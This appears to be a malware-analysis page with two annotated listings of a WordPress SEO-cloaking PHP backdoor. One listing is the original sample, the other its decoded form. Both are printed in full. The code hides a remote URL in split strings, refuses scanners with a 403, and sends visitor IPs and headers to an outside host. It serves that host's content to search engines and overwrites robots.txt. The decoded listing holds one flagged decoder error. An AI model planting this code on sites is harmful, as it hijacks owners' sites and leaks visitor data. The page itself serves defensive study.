De-obfuscate PHP malware, viruses and tampering code found on WordPress sites into readable source code.
*Please note that not all obfuscation codes can be decoded.
<?php
/*
 * Analyst annotations on the sample as submitted. Only line breaks, indentation
 * and comments were added; the code itself is unchanged.
 *
 * What the visible code does: for requests that look like search-engine traffic
 * (or that hit a few marker URLs) it fetches a response from a remote host and
 * echoes it in place of the site's own page, and it overwrites robots.txt.
 * Requests from a long list of scanners and scripted clients get a 403 instead.
 *
 * Indicators visible in this sample:
 *   - outbound HTTP to cw1475.smoothan[.]com (defanged in this note) carrying the
 *     query parameters agent, refer, lang, ip, dom, http, uri, pc, rewriteable,
 *     script and, on one path, sitemap
 *   - a file xvy.txt containing "0" or "1" in the script's working directory
 *   - robots.txt rewritten in the script's working directory
 *   - request URIs containing xvyxvy, pingsitemap or jp2023
 */

// Obfuscation: the remote URL is split into five out-of-order fragments and
// joined at runtime, so the host name never appears as one literal. A plain
// string search for the full host in this file will not match; search for the
// fragments instead.
$swkm='m/';$hlme='h';$qkrh='p://cw1475.smoo';$clga='tt';$kgzs='than.co';
$zqnwd=$hlme.$clga.$qkrh.$kgzs.$swkm; // evaluates to "http://cw1475.smoothan.com/"

$pc = "AgBRBgq"; // sent to the remote host as "pc"; meaning not visible here (presumably a site or campaign id)
$bagent = "Yahoo|Google|Docomo|Bing"; // regex alternation used below to recognise search-engine traffic
error_reporting(0); // turn off PHP error reporting for this request

// Evasion: unanchored, case-insensitive match on the User-Agent. Scanners, SEO
// crawlers and scripted HTTP clients are refused with a 403 before anything
// else happens. A page that answers 403 to such a client but 200 to a browser
// is a detection signal for this sample.
if(preg_match("/(LightDeckReports Bot|Python-urllib|Java|Go-http-client|Paloaltonetworks|Indy Library|ahrefsBot|CrawlDaddy|DigExt|OBot|SeznamBot|UniversalFeedParser|Python|AskTbFXTV|semrushBot|Bytespider|Scrapy|PetalBot|Swiftbot|DataForSEO|coolpadWebkit|ApacheBench|CensysInspect|mj12bot|Jaunty|EasouSpider|ZmEu|heritrix|feedDemon|Python-requests|yySpider|ezooms|feedly|DotBot|amazonBot|yisouSpider|JikeSpider|YandexBot|Barkrowler|HttpClient|GPTBot)/i", $_SERVER['HTTP_USER_AGENT'])) {
    header('HTTP/1.0 403 Forbidden');
    exit();
}

// Request metadata gathered for the outbound request; every value is URL-encoded.
$refer = urlencode(@$_SERVER['HTTP_REFERER']);
$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$ip = $_SERVER['REMOTE_ADDR'];
// Client-supplied headers take priority over the socket address, so the
// reported IP is whatever the request claims.
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
$ip = urlencode($ip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);

// Scheme detection. Note that it writes the result back into the $_SERVER
// superglobal, which any code running later in the same request will see.
if ((!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https') or (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') or (!empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443') or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) {
    $_SERVER['REQUEST_SCHEME'] = 'https';
} else {
    $_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);

// Self-test endpoint: any request whose URI contains "xvyxvy" is answered with
// the bare string "ok" and nothing else.
if(strpos($uri,"xvyxvy") !== false){echo "ok";exit();}

// One-time probe, cached in xvy.txt. The script requests /xvyxvy on its own
// host (host name taken from the request's Host header). An "ok" answer shows
// that a request for that path reached this script - presumably a check that
// URL rewriting is active. The result is stored as "1" or "0" and later sent
// as the "rewriteable" parameter.
$xvy = 0;
$xvyFilePath = "xvy.txt";
if(!is_file($xvyFilePath)) {
    $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/xvyxvy';
    $vaum = @file_get_contents($uuu);
    if($vaum === "ok") {
        $xvy = 1;
        writeToFile($xvyFilePath,"1");
    } else {
        $xvy = 0;
        writeToFile($xvyFilePath,"0");
    }
} else {
    $xvy = readFromFile($xvyFilePath); // string "0"/"1" from the cache file, or false if it cannot be opened
}

// Helper: overwrite $filePath with $content. Returns true on success, false if
// the file cannot be opened. It is called above before this definition, which
// works because PHP hoists unconditional top-level function declarations.
function writeToFile($filePath, $content) {
    $file = fopen($filePath, "w");
    if ($file) {
        fwrite($file, $content);
        fclose($file);
        return true;
    }
    return false;
}

// Helper: return the whole content of $filePath, or false if it cannot be opened.
function readFromFile($filePath) {
    $file = fopen($filePath, "r");
    if ($file) {
        $content = fread($file, filesize($filePath));
        fclose($file);
        return $content;
    }
    return false;
}

// Cloaking decision. favicon.ico requests are left alone. The remote fetch runs
// only when the URI contains robots.txt, pingsitemap or jp2023, when the raw
// REQUEST_URI ends in "xml" (the dot in the pattern is unescaped, so it matches
// any character), or when the User-Agent or Referer contains one of the
// $bagent names. Every other request falls through to the site's normal page,
// which is why the owner usually sees nothing wrong in a browser.
if(strpos($uri,"favicon.ico") !== false) {
} else if(strpos($uri,"robots.txt") !== false or strpos($uri,"pingsitemap") !== false or strpos($uri,"jp2023") !== false or preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI']) or preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) {
    // Outbound request: the visitor's metadata is handed to the remote host in the query string.
    $requsturl = $zqnwd."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$xvy&script=$script";
    $robots_contents = "";
    if(strpos($uri,"pingsitemap") !== false) {
        // pingsitemap path: build a sitemap URL for this site, prepare a
        // robots.txt that allows everything and advertises that sitemap, print
        // the sitemap URL, and report it to the remote host.
        $scripname = $_SERVER['SCRIPT_NAME'];
        if(strpos($scripname,"index.ph") !== false) {
            if($xvy == 0) {
                $scripname = '/?';
            } else {
                $scripname = '/';
            }
        } else {
            $scripname = $scripname.'?';
        }
        $robots_contents = "User-agent: *\r\nAllow: /";
        $sitemap = "$http://" . $domain .$scripname. "sitemap.xml";
        $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";
        $sitemapstatus = "";
        echo $sitemap.": ".$sitemapstatus.'<br/>';
        $requsturl = $zqnwd."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$xvy&script=$script&sitemap=".urlencode($sitemap);
    }
    // Fetch with file_get_contents (warnings silenced), falling back to cURL
    // when that returns nothing. The cURL path turns certificate and host-name
    // verification off; the URL built above is plain http in this sample.
    $vaum = @file_get_contents($requsturl);
    if(empty($vaum)) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $requsturl);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
        $vaum = curl_exec($ch);
        curl_close($ch);
    }
    if(!empty($vaum)) {
        // A body starting with "error code", or equal to "500", is turned into an HTTP 500.
        if(substr($vaum,0,10)=="error code"||$vaum == "500") {
            header("HTTP/1.0 500 Internal Server Error");
            exit();
        }
        // jp2023 requests get a 404 status line, but the body is still echoed below.
        if(strpos($uri,"jp2023") !== false){header('HTTP/1.1 404 Not Found');}
        else if(substr($vaum,0,5)=="<?xml") {
            header('Content-Type: text/xml; charset=utf-8');
        } else {
            header('Content-Type: text/html; charset=utf-8');
        }
        // The remote response is echoed as-is (it is not evaluated as PHP in
        // this sample) and replaces the site's own output for this request.
        echo $vaum;
        // Persistent change: robots.txt is overwritten either with the sitemap
        // stanza built above or with the raw remote response. Compare the
        // site's robots.txt against a known-good copy during clean-up.
        if(!empty($robots_contents)){writeToFile("robots.txt",$robots_contents);}
        else if(strpos($uri,"robots.txt") !== false){writeToFile("robots.txt",$vaum);}
        exit();
        return; // never reached: exit() above ends the request
    }
}else{
}
?>
<?php
/*
 * Decoder output for the sample shown above it on this page, annotated for
 * analysts. Only line breaks, indentation and comments were added.
 *
 * Summary of the visible behaviour: requests from a list of scanners and
 * scripted clients are refused with a 403; requests that look like
 * search-engine traffic (or hit the marker URLs robots.txt, pingsitemap,
 * jp2023, or a path ending in "xml") are answered with content fetched from
 * cw1475.smoothan[.]com (defanged in this note); robots.txt is overwritten;
 * all other requests pass through to the normal site.
 *
 * Differences from the submitted sample that come from the decoder, not the
 * malware: the concatenated URL is resolved to one literal, redundant
 * parentheses are dropped, "else if" is printed as a nested "else { if }",
 * an unreachable "return;" after the final exit is gone, and one string
 * literal is altered (flagged where it occurs below).
 */

// Left over from the original string-splitting obfuscation; unused in this listing.
$swkm = 'm/';
$hlme = 'h';
$qkrh = 'p://cw1475.smoo';
$clga = 'tt';
$kgzs = 'than.co';
// Remote content host, resolved by the decoder from the five fragments above.
$zqnwd = "http://cw1475.smoothan.com/";
$pc = "AgBRBgq"; // forwarded as the "pc" query parameter; meaning not visible here (presumably a site or campaign id)
$bagent = "Yahoo|Google|Docomo|Bing"; // names matched against User-Agent and Referer further down
error_reporting(0); // turn off PHP error reporting for this request

// User-Agent blocklist (unanchored, case-insensitive): matching clients get a
// 403 and the request ends. Useful as a check during triage: a differing
// response between a listed client and a browser points to this code.
if (preg_match("/(LightDeckReports Bot|Python-urllib|Java|Go-http-client|Paloaltonetworks|Indy Library|ahrefsBot|CrawlDaddy|DigExt|OBot|SeznamBot|UniversalFeedParser|Python|AskTbFXTV|semrushBot|Bytespider|Scrapy|PetalBot|Swiftbot|DataForSEO|coolpadWebkit|ApacheBench|CensysInspect|mj12bot|Jaunty|EasouSpider|ZmEu|heritrix|feedDemon|Python-requests|yySpider|ezooms|feedly|DotBot|amazonBot|yisouSpider|JikeSpider|YandexBot|Barkrowler|HttpClient|GPTBot)/i", $_SERVER['HTTP_USER_AGENT'])) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}

// Visitor and request details, URL-encoded for the query string built later.
$refer = urlencode(@$_SERVER['HTTP_REFERER']);
$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$ip = $_SERVER['REMOTE_ADDR'];
// HTTP_CLIENT_IP, then X-Forwarded-For, replace the socket address when present;
// both are request headers, so the value is not trustworthy.
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
$ip = urlencode($ip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);

// Scheme detection. The decoder removed the grouping parentheses; "and" binds
// tighter than "or" in PHP, so the condition still reads as four and-pairs
// joined by or. The result is written back into $_SERVER.
if (!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https' or !empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on' or !empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443' or isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
    $_SERVER['REQUEST_SCHEME'] = 'https';
} else {
    $_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);

// Any URI containing "xvyxvy" gets the literal response "ok"; this is the
// target of the self-probe just below.
if (strpos($uri, "xvyxvy") !== false) {
    echo "ok";
    exit;
}

// Self-probe, run once and cached in xvy.txt in the working directory: fetch
// /xvyxvy from the host named in the request's Host header and record "1" if
// the answer is "ok", otherwise "0". Presumably this detects whether URL
// rewriting sends arbitrary paths to this script; the value is reported to the
// remote host as "rewriteable".
$xvy = 0;
$xvyFilePath = "xvy.txt";
if (!is_file($xvyFilePath)) {
    $uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/xvyxvy';
    $vaum = @file_get_contents($uuu);
    if ($vaum === "ok") {
        $xvy = 1;
        writeToFile($xvyFilePath, "1");
    } else {
        $xvy = 0;
        writeToFile($xvyFilePath, "0");
    }
} else {
    $xvy = readFromFile($xvyFilePath); // cached value as a string, or false when the file cannot be opened
}

// Write $content to $filePath, truncating any existing file.
// Returns true when the file was opened and written, false otherwise.
// Used before this point in the file; unconditional top-level functions are
// available throughout the script in PHP.
function writeToFile($filePath, $content)
{
    $file = fopen($filePath, "w");
    if ($file) {
        fwrite($file, $content);
        fclose($file);
        return true;
    }
    return false;
}

// Read and return the full content of $filePath; false when it cannot be opened.
function readFromFile($filePath)
{
    $file = fopen($filePath, "r");
    if ($file) {
        $content = fread($file, filesize($filePath));
        fclose($file);
        return $content;
    }
    return false;
}

// Selection of requests to cloak. favicon.ico is skipped. The branch is taken
// for the marker URIs, for a REQUEST_URI ending in "xml" (unescaped dot, so
// any character may precede it), and for a User-Agent or Referer containing a
// $bagent name - that is, crawlers and visitors arriving from search results.
if (strpos($uri, "favicon.ico") !== false) {
} else {
    if (strpos($uri, "robots.txt") !== false or strpos($uri, "pingsitemap") !== false or strpos($uri, "jp2023") !== false or preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_REFERER'])) {
        // Query string that carries the collected request details to the remote
        // host; these parameter names are a usable pattern for proxy or egress logs.
        $requsturl = $zqnwd . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$xvy}&script={$script}";
        $robots_contents = "";
        if (strpos($uri, "pingsitemap") !== false) {
            // Builds this site's sitemap URL (query-string form unless the probe
            // stored "1"), a permissive robots.txt that points to it, prints the
            // URL, and appends it to the outbound request.
            $scripname = $_SERVER['SCRIPT_NAME'];
            if (strpos($scripname, "index.ph") !== false) {
                if ($xvy == 0) {
                    $scripname = '/?';
                } else {
                    $scripname = '/';
                }
            } else {
                $scripname .= '?';
            }
            $robots_contents = "User-agent: *\r\nAllow: /";
            $sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml";
            $robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}";
            $sitemapstatus = "";
            echo $sitemap . ": " . $sitemapstatus . '<br/>';
            $requsturl = $zqnwd . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$xvy}&script={$script}&sitemap=" . urlencode($sitemap);
        }
        // Remote fetch: file_get_contents with warnings silenced, then cURL as a
        // fallback with certificate and host-name checks switched off (the URL
        // above is plain http in this listing).
        $vaum = @file_get_contents($requsturl);
        if (empty($vaum)) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $requsturl);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
            $vaum = curl_exec($ch);
            curl_close($ch);
        }
        if (!empty($vaum)) {
            // Remote error markers are surfaced to the client as an HTTP 500.
            if (substr($vaum, 0, 10) == "error code" || $vaum == "500") {
                header("HTTP/1.0 500 Internal Server Error");
                exit;
            }
            if (strpos($uri, "jp2023") !== false) {
                // Status line says 404, yet the fetched body is still sent below.
                header('HTTP/1.1 404 Not Found');
            } else {
                // NOTE(review): decoder artifact. The submitted sample compares
                // against the five-character XML prolog marker; this listing
                // prints "<?php xml" instead, and a five-character prefix can
                // never equal that nine-character literal. Rely on the original
                // sample for this branch.
                if (substr($vaum, 0, 5) == "<?php xml") {
                    header('Content-Type: text/xml; charset=utf-8');
                } else {
                    header('Content-Type: text/html; charset=utf-8');
                }
            }
            // The fetched body is printed verbatim; it is not executed as PHP here.
            echo $vaum;
            // robots.txt in the working directory is replaced, either by the
            // sitemap stanza or by the remote body. Restore it from a known-good
            // copy and remove xvy.txt when cleaning an affected site.
            if (!empty($robots_contents)) {
                writeToFile("robots.txt", $robots_contents);
            } else {
                if (strpos($uri, "robots.txt") !== false) {
                    writeToFile("robots.txt", $vaum);
                }
            }
            exit;
        }
    } else {
    }
}